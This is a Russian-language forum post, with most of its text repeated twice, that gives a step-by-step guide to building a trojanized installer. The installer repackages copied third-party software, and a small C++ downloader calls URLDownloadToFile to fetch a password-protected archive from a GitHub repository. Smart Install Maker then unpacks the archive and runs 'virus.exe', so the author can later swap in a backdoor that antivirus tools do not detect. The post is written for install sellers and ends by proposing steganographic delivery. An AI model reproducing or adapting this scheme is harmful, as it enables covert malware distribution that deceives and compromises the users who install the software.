- Регистрация
- 31.12.2019
- Сообщения
- 7,569
- Реакции
- 36
По многочисленным просьбам юных трафикмейкеров и инсталлоселлеров сегодня поведаю как из говна и палок собрать убогий инсталлятор с убогим бекдором но который все же работает и не детектится.
Не на что не претендую это всего лишь рабочий концепт. Знаю что можно сделать сложнее.
1. Качаем и устанавливаем убогий Smart Install Maker
2. Копипиздим файлы какого либо убогого софта который мы будем юзать и выдавать за наш.
3. Создаем убогую учетку на гитхабе и создаем первый репозиторий.
4. Берем какие нибудь убогие и безобидные dll 1-2 штуки например vc140.dll и т.д. и создаем самораспаковывающийся запароленный rar архив. Как на скринах.
5. Заливаем этот самораспаковывающийся запароленный rar архив (т.е. exe файл) на гитхаб в корень нашего репозитория
6. Открываем VisualStudio и последовательно тыкаем File - New Project - Win32 Console Application
Задаем имя нашему проекту (допустим libsqlupdate)
В application wizard тыкаем Next и потом Finish.
Вставляем следуюший код
github-username - меняем на имя нашего убогого пользователя на гитхабе
myreponame - меняем на имя нашего убогого репозитория где будет хранится файлы.
files.exe - имя нашего убогого самораспаковывающегося запароленного rar архива в убогом репозитории на гитхабе.
resupdate.exe - меняем на files.exe или любое удобное для вас имя (потом нужно будет это имя прописывать в команды Smart Install Maker
Меняем тип сборки с Debug на Release
И собираем проект - нажимаем control + shift + b
В папке C:\Users\ВашУбогийЮзерВинды\Documents\Visual Studio 2013\Projects\libsqlupdate\Release
будет лежать файл libsqlupdate.exe
Кладем его в папку с остальными файлами для проекта Smart Install Maker
7. Создаем подобный проект в Smart Install Maker и прописываем все как на скринах (естественно меняем названия на свое усмотрение). Все используемые на скринах программы вымышленные, любое совпадение с реальными программами считать слуайностью.
8. Далее прописываем такие команды в наш проект.
virus.exe - можно моменять на любое удобное имя.
Где 777777777777777777 это пароль которым мы зашифровали наш самораспаковывающийся архив.
Сразу заметил косяк. На скрине где прописывается запуск virus.exe стоит before unpacking а должно стоять after
Готово. Когда на гитхабе архив с безобидными dllками то и наш инстлятор соответственно безобиден. Но стоит только нам заменить архив на гитхабе и поместить внутрь него virus.exe то будет выполнятся наш бекдор.
Думаю написать подобную статью о создании инсталлятора но с использованием методов стеганографии. Например не будет качаться напрямую exe файл, а будет качатся пикча из которой будет собираться exe и т.д.
Автор: tellst1
Не на что не претендую это всего лишь рабочий концепт. Знаю что можно сделать сложнее.
1. Качаем и устанавливаем убогий Smart Install Maker
2. Копипиздим файлы какого либо убогого софта который мы будем юзать и выдавать за наш.
3. Создаем убогую учетку на гитхабе и создаем первый репозиторий.
4. Берем какие нибудь убогие и безобидные dll 1-2 штуки например vc140.dll и т.д. и создаем самораспаковывающийся запароленный rar архив. Как на скринах.
5. Заливаем этот самораспаковывающийся запароленный rar архив (т.е. exe файл) на гитхаб в корень нашего репозитория
6. Открываем VisualStudio и последовательно тыкаем File - New Project - Win32 Console Application
Задаем имя нашему проекту (допустим libsqlupdate)
В application wizard тыкаем Next и потом Finish.
Вставляем следуюший код
Код:
#include <string>
using namespace std;
int main()
{
URLDownloadToFile(0, L"https://github.com/github-username/myreponame/raw/master/files.exe", L"resupdate.exe", 0, 0);
return 0;
}
github-username - меняем на имя нашего убогого пользователя на гитхабе
myreponame - меняем на имя нашего убогого репозитория где будет хранится файлы.
files.exe - имя нашего убогого самораспаковывающегося запароленного rar архива в убогом репозитории на гитхабе.
resupdate.exe - меняем на files.exe или любое удобное для вас имя (потом нужно будет это имя прописывать в команды Smart Install Maker
Меняем тип сборки с Debug на Release
И собираем проект - нажимаем control + shift + b
В папке C:\Users\ВашУбогийЮзерВинды\Documents\Visual Studio 2013\Projects\libsqlupdate\Release
будет лежать файл libsqlupdate.exe
Кладем его в папку с остальными файлами для проекта Smart Install Maker
7. Создаем подобный проект в Smart Install Maker и прописываем все как на скринах (естественно меняем названия на свое усмотрение). Все используемые на скринах программы вымышленные, любое совпадение с реальными программами считать слуайностью.
8. Далее прописываем такие команды в наш проект.
virus.exe - можно моменять на любое удобное имя.
Где 777777777777777777 это пароль которым мы зашифровали наш самораспаковывающийся архив.
Сразу заметил косяк. На скрине где прописывается запуск virus.exe стоит before unpacking а должно стоять after
Готово. Когда на гитхабе архив с безобидными dllками то и наш инстлятор соответственно безобиден. Но стоит только нам заменить архив на гитхабе и поместить внутрь него virus.exe то будет выполнятся наш бекдор.
Думаю написать подобную статью о создании инсталлятора но с использованием методов стеганографии. Например не будет качаться напрямую exe файл, а будет качатся пикча из которой будет собираться exe и т.д.
Автор: tellst1